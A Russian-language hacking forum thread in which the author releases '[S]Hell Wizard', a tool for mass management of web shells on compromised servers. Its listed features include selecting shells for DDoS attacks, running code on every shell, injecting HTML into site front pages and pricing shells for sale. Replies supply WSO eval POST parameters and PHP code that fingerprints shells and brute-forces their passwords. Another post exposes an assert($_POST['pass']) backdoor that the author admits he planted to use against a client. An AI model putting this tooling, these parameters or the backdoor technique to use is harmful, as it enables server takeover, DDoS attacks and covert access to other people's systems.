RDot: White Hat Security Community

RDot: White Hat Security Community (https://rdot.org/forum/index.php)
-   Релизы/Releases (https://rdot.org/forum/forumdisplay.php?f=11)
-   -   [S]Hell Wizard - управляем веб-шеллами вместе c Dr.Z3r0 :) (https://rdot.org/forum/showthread.php?t=136)

Dr.Z3r0 06.07.2010 15:46

[S]Hell Wizard - управляем веб-шеллами вместе c Dr.Z3r0 :)
 
Вложений: 1
Вообщем представляю вашему вниманию свою тулзу для управления шеллами:

[S]Hell Wizard
Текущая версия: 5.0 (28.12.2011)

Введение
Даная система предназначенна для массового управления веб шеллами нескольких типов. Как в плюс пытался создать максимально интуитивно понятный интерфейс, но и в тоже время оставить большой функционал в этой тулзе.

Основной принцип на котором основанна эта система - хранение информации о каждом из шеллов, о сервере на котором он расположен, о домене в БД - так упрощается выборка шеллов под ваши нужды.

К примеру, есть у вас огромный список из тысячи веб шеллов, и вам требуются шеллы под организацию ДДОС атаки - можно без проблем сделать выборку по параметрам PHP установленного на сервере, таким как есть ли возможность управлять set_time_limit-ом, можно ли установить ignore_user_abort=true, включены ли сокеты и отсортировать вывод по ширине канала сервера, ну чем не сказка?)

Основные достоинства
- Гибкая настройка выборки шеллов, и имхо достаточно интуитивно понятная
- Интересующая вас информация о сервере для каждого веб шелла
- Чек на PR каждого домена
- Настройки вывода как в браузер так и в файл
- Выполнение кода для каждого из веб шеллов
- reverse-ip для домена на котором расположен шелл в один клик
- Фишка с возможностью продолжения работы скрипта
- Возможно добавление хтмл кода в морду сайта
- Возможна организация ддос атак
- работа с бд прям из тулзы (скуль запросы и бекап БД)
- Ну и есть небольшой мануал, правдо недописанный до конца - так как меня вдруг охватил приступ лени.

Добавленно
С прошлой версии (4.3) много разных фишек не помню все, но вот то что вспомнил:
- Для каждого шелла создан свой файл-модуль (теперь с минимальными знаниями PHP можно добавить свой шелл)
- Добавленна поддержка проксей
- Проверка ТИЦ
- Проверка Alexa
- Расчет приблизительной цены шелла
- Разбиение шеллов на группы при добавлении их в БД
- Чек PR работает снова
- Добавление кода в htaccess если есть права
- И дадада! WSO поддерживатеся из коробки!

Шеллы с паролем добавлять в следующем формате:
Цитата:

если только пароль:
http://host1/path/wso.php|root
если пара логин/пароль:
http://host2/path/r57.php|admin|pass
Недостатки
Собственно это те недостатки которые я в ближайщем будущем планирую исправить:
- Как кое кто сказал - ужасный дизайн (ну не дизайнер я, хоть убей).

Где взять
По ссылке последняя версия: ShellWizard 5.0

Заключение
Тулза раз двадцать переписанная, могут быть баги, о багах пишите здесь.
Блаблабла, юзайте наздоровье)


В аттаче старая версия 4.3, ссылку на новую ищи выше

esh 06.07.2010 20:37

Релиз просто ШЕДЕВР! НЕТ СЛОВ!
Сам хотел написать, но я для этого слишком туп.

Единственный серьезный косяк, это неумение тулзы работать с нормальной POST\Session авторизацией, да да, как раз в той, что сделана для wSo, я между прочем был удивлен, почему в списке wSo так и не оказалось, а помоему самый ходовой шелл, не?

И ещё вот что. не нашел где там можно сделать DDoS, мб плохо искал? Ткните носом плз..........

esh 06.07.2010 21:32

Цитата:

Сообщение от BlackSun (Сообщение 1005)
WSO нет скорее всего по той причине, что эта утилита писалась еще до того, как вышла хотя бы первая версия этого шелла.

WS0 нет, но способ авторизации всегда был, не?
Очень надеюсь, что автор его все-таки добавит в ближайшие намедни.

И все-же ответьте на мой поставленный вопрос по поводу DDoS`a!

GrandMaster 09.07.2010 13:11

да, добавить бы туда wso и цены ей не будет :)

Nightmare 10.07.2010 19:39

Цитата:

Сообщение от GrandMaster (Сообщение 1857)
да, добавить бы туда wso и цены ей не будет :)

Так его и добавлять то нечего, заходим в меню "Добавить шелл" и там:
1) ID: wso
2) Имя: WSO Shell
3) Регулярка: #WSO#i
4) eval GET: [none]
5) eval POST: a=Php&p1=[evalcode]

Все работает проще некуда, а вот косяк с запароленными шеллами действительно досадный.

vasya 28.10.2010 13:29

как такую ошибку исправить

Цитата:

(00:53:46) [2] preg_match() [<a href='function.preg-match'>function.preg-match</a>]: Compilation failed: missing ) at offset 22 Z:\home\localhost\www\shell_wizard\includes\func.s hell.php (line 61)
при чеке шеллов выдаёт

Dr.Z3r0 29.10.2010 15:17

кривая регулярка в списке типов шеллов, подправь ее

euro 04.11.2010 14:21

чек запароленых wso не планируется ?

paranoidchaos 04.11.2010 14:27

Цитата:

а вот косяк с запароленными шеллами действительно досадный.
а чё за косяк ?? как ваще чекаете ? бейсик авторизация простая

robert 12.11.2010 12:44

Да, было бы не плохо сделать добавление WSO с авторизацией.

Boddhisatva 23.11.2010 15:20

Как вариант - брать незапароленный WSO, и немного модифицировать его, чтобы работал только, например, при if($_GET['wso']=='launch'), или как там. И эту строку в настройках прописать.
Хоть какая-то безопасность от посторонних глаз.

Acez666 16.12.2010 00:34

досю себя в netstat ничего нету и в логах апатча. не досит чтоли?

Acez666 16.12.2010 01:07

а не поперло, надо 600 потоков ставить.

dasknix 26.12.2010 19:50

про защищенные (не обязательно пассами, можно создать свой способ):

увидел тут на днях шелвизард и дофига чего не устроило, хз, может я претенционзен,
либо сабжевый sh wiz ещё слишком молод. в любом случае спасибо автору, т.к. несмотря
на то что идея создать shm для автоматизации и управления была давно.. ну вы сами
знаете - идей дофига а на практике по проекту в полгода дай бог рожаем

написал свой, собссно пару фрагов кода, весь выложить не могу, за EP считаем shdet()
PHP код:

// sh pattz
    
$shpats = array(
         
T_VITAL =>    array(
             
def => array('<title>VITAL</title>')
            ,
auth => array(
                 
'input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}'
                
,'<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">'
             
)
            ,
auth_answ => array(
                 
'<meta http-equiv="refresh" content="1;URL='
                
,'<a style="font:12px Verdana" href="'
                
,'">Success</a>'
             
)
         )
        ,
T_WSO => array(
             
def => array("BOFF 1.0")
            ,
auth => array(
                 
"<pre align=center><b>Authorization</b><br>"
                
,"0ff \/\/"
                
,"<br><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"
            
)
         )
        
#,T_CMAD => ""
        #,T_R57 => ""
    
); 

PHP код:

function shdet(array $sh){
    global 
$shpats;
    global 
$pwdz;
    global 
$shz;

    
$buf nw_get(M_GET$sh[url]);

    foreach(
$shpats as $shpat_type => $shpat){
        if(
inarr($shpat[def],$buf)){
            
mod($sh,    AUTH_NO,        auth,need);
            
mod($sh,    $shpat_type,    type);
            
mod($sh,    ONLINE,            status);
            
/*
                $shz[$sh[id]][auth][need]    = AUTH_NO;
                $shz[$sh[id]][type]            = $shpat_type;
                $shz[$sh[id]][status]        = ONLINE;
                $shz[$sh[id]][update]        = ONLINE;
            */
            
return true;
        }
    }

    foreach(
$shpats as $shpat_type => $shpat){
        foreach(
$shpat[auth] as $auth_pat){
            if(
strpos($buf$auth_pat) !== false){
                global 
$cookie;

                
$shz[$sh[id]][type] = $shpat_type;
                
$sh[type] = $shpat_type;
                
$shz[$sh[id]][auth][need] = AUTH_USE;

                
// auth to sh with current shpat type
                    
foreach($pwdz as $pw){
                        
$auth_answ make_auth($sh$pw);
                        if(
$shpats[$shpat_type][auth_answ][0])
                            
$auth inarr($shpats[$shpat_type][auth_answ], $auth_answ) ? OK false;
                        else
                            
$auth inarr($shpats[$shpat_type][def], $auth_answ) ? OK false;

                        if(
$auth){
                            
$shz[$sh[id]][auth][state] = OK;
                            
$shz[$sh[id]][auth][pw] = $pw;
                            
$shz[$sh[id]][auth][cook] = $cookie $cookie null;
                            return 
true;
                        }
                        global 
$auth_delay;
                        
sleep($auth_delay);
                    }
                
//

                
if(!$auth$shz[$sh[id]][auth][state] = FAIL;
                return 
true;
            }
        }
    }

    return 
false;


PHP код:

function make_auth(array $sh$pw){
    global 
$shz;

    
cook($sh);

    switch(
$shz[$sh[id]][type]){        // don' use local old $sh!
        
case T_VITAL:
            
$nwreq_method    M_POST;
            
$nwreq_fpath    $sh[url];
            
$nwreq_postargs    = array(
                                        
'doing'        => 'login'
                                    
,    'password'    => $pw
                                    
);
            
# $cookie        = array('phpspypass'    => $pw);

            
return nw_get($nwreq_method$nwreq_fpath$nwreq_postargs);
        break;
        case 
T_WSO:
            
$nwreq_method    M_POST;
            
$nwreq_fpath    $sh[url];
            
$nwreq_postargs    = array('pass'    => $pw);
            
            return 
nw_get($nwreq_method$nwreq_fpath$nwreq_postargs);
        break;
        case 
T_CMAD:
        break;
        case 
T_R57:
        break;
        default:
            return 
false;
    }


само собой делаем регексы, паттерны что
выше по strpos() сделаны на скорую руку

spiderbuber 25.03.2011 05:33

Также при чеке ошибка:
Цитата:

(12:09:42) [2] preg_match() [<a href='function.preg-match'>function.preg-match</a>]: Compilation failed: missing ) at offset 22 X:\home\shwizard\www\includes\func.shell.php (line 61)
Пробовал на разных шеллах. Как поправить регулярку?

Хотелось бы увидеть в новой версии возможность чека не только ПР, но и ТИЦ + Стату ЛИ.РУ а также добавить несколько полей для произвольных меток и комметариев.

Cuko 09.12.2011 08:32

не работает скрипт=\ делаю на локал хосте, в xampp, не добавляет более одного шелла за раз, а по одному не айс как то.

curlbaby 11.12.2011 18:41

для WSO с паролем достаточно передать его по POST, как пример:

Цитата:

Сообщение от Nightmare (Сообщение 2116)
5) eval POST: a=Php&p1=[evalcode]


5) eval POST: pass=password&a=Php&p1=[evalcode]

(dm) 24.12.2011 18:04

Мне понравилась 33 строчка index.php:
Цитата:

if(!empty($_POST['pass']) && !assert($_POST['pass']))die();

M_script 25.12.2011 16:57

Цитата:

Сообщение от (dm)
Мне понравилась 33 строчка index.php

Так вот что означают слова "вместе c Dr.Z3r0" в названии темы.

Dr.Z3r0 28.12.2011 19:11

Цитата:

Сообщение от (dm) (Сообщение 22679)
Мне понравилась 33 строчка index.php:

упс, дико извиняюсь) осталось от старых версий))
тулза разрабатывалась на заказ, с заказчиком работал впервые поэтому был оставлен бекдор на случай если заказчик кинет.
я уже забыл про него :fpalm:

еще раз извиняюсь, я не спецом, серьезно)

UPD:
И дабы загладить свою вину, выкладываю новую версию 5.0. Изменения:
Цитата:

С прошлой версии (4.3) много разных фишек не помню все, но вот то что вспомнил:
- Для каждого шелла создан свой файл-модуль (теперь с минимальными знаниями PHP можно добавить свой шелл)
- Добавленна поддержка проксей
- Проверка ТИЦ
- Проверка Alexa
- Расчет приблизительной цены шелла
- Разбиение шеллов на группы при добавлении их в БД
- Чек PR работает снова
- Добавление кода в htaccess если есть права
- И дадада! WSO поддерживатеся из коробки!
PS: в ней бекдоров нету... вроде...))

spiderbuber 23.01.2012 07:34

Писал автору в личку, но в ответ тишина.. Спрошу тут.

Как юзать прокси? Понятно что нужно забить в proxy.txt, но где и как включить этот функционал? Есть ли чеккер и автоудаление мертвых проксей?

При выполнении php часто ругается:
PHP код:

(09:57:59) [8Undefined variablevariants_exec /путь/modules/incl.list/do_eval.php (line 39)
(
09:57:59) [2Invalid argument supplied for foreach() /путь/modules/incl.list/do_eval.php (line 39

39 строка - это:
PHP код:

foreach($variants_exec as $key=>$name){ 

О чем говорит эта ошибка и как поправить?

При чеке тиц\пр ругается:
PHP код:

(09:18:36) [8Uninitialized string offset: -/путь/includes/func.pr.php (line 17

17 строка - это:
PHP код:

return $vector[($num 256) / 16] . $vector[$num 16]; 

О чем говорит эта ошибка и как поправить?

Функция "Поиск чужих шеллов". Как она осуществляется и по каким параметрам ищет? И работает ли вообще?

Что обозначают цифры перед чекбоксами в списке шеллов? У меня выводятся разные, от 1 до 13..

Работает ли функция поиска соседних сайтов. Как ее активировать? Ради интереса прощелкал около 100 шеллов, ответ один - "Не найдено соседних сайтов"

Не работает пункт "Добавить ссылки в морду" - Error: can not get html code. Как поправить?

"Добавить код в морду". В начало индексного файла добавляется нормально, а в конец - unknown error. Как поправить?

Результат выполнения пхп кода выводится в строку, что не очень читаемо. Добавление ни "<br\>" ни "\n" ни других символов - не помогают. Как выводить результат выполнения пхп в красивом виде?

QaRTiN 21.10.2012 18:56

ребят,перезалейте последнюю версию визарда,пожалуйста ;)
P.S.мб,знает кто,есть ли аналоги этой тулзы?)


нашел сам,может кому-то пригодится ;)
http://www.sendspace.com/file/w0svaq

norm 25.12.2012 01:58

подскажите пожалуста, столкнулся с проблемой.
Установил визарда нормально, прописал все пути до мускула, все стоит ровно.
Ввожу пароль и логин на вход и ошибка вылетает
Can not set_time_limit(0)
Подскажите что может быть такое ?

mironich 29.12.2012 23:38

Цитата:

Сообщение от norm (Сообщение 29959)
подскажите пожалуста, столкнулся с проблемой.
Установил визарда нормально, прописал все пути до мускула, все стоит ровно.
Ввожу пароль и логин на вход и ошибка вылетает
Can not set_time_limit(0)
Подскажите что может быть такое ?

Не может убрать лимит на время выполнения скрипта.
М.б прав не хватает.

PurePass 03.01.2013 18:43

Цитата:

Сообщение от norm (Сообщение 29959)
подскажите пожалуста, столкнулся с проблемой.
Установил визарда нормально, прописал все пути до мускула, все стоит ровно.
Ввожу пароль и логин на вход и ошибка вылетает
Can not set_time_limit(0)
Подскажите что может быть такое ?

посмотри выполнение скриптов, если в панели всё делаешь... cgi, php, java... обычно из-за этого такая трабла вылазит...

PurePass 16.02.2013 18:09

у кого-то работает данная весч? :) поставил для теста при добавлении говорит
- не могу подключится к хосту
- не могу определить тип шелла
странно( проверял всё доступно(

recfrf 29.03.2013 22:27

выбираешь один шелл и выполняешь
copy("a","b");

free_style 27.07.2013 18:29

Не работает чек пр и алексы... и Можете подсказать как массово вывести uname шеллов ?

trineax 16.12.2013 18:58

никак не может определить тип шелла. почему? добавляю wso.

Somat 17.12.2013 18:23

перезалейте пжлст.

x999xx 07.09.2014 14:34

плз перезалейте

palavan 01.10.2014 12:46

Вот. Работает: http://www.sendspace.com/file/w0svaq

poZaliN 12.10.2017 08:51

Перезалейте последнюю доступную версию, ссылка дохлая. В шапке 4.3.
Кто проверял на стучалки?

olegdenega 03.03.2020 13:54

У кого осталась версия 5.0, перезалейте, пожалуйста (или в личку), нигде не могу найти.


Часовой пояс GMT +3, время: 04:25.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot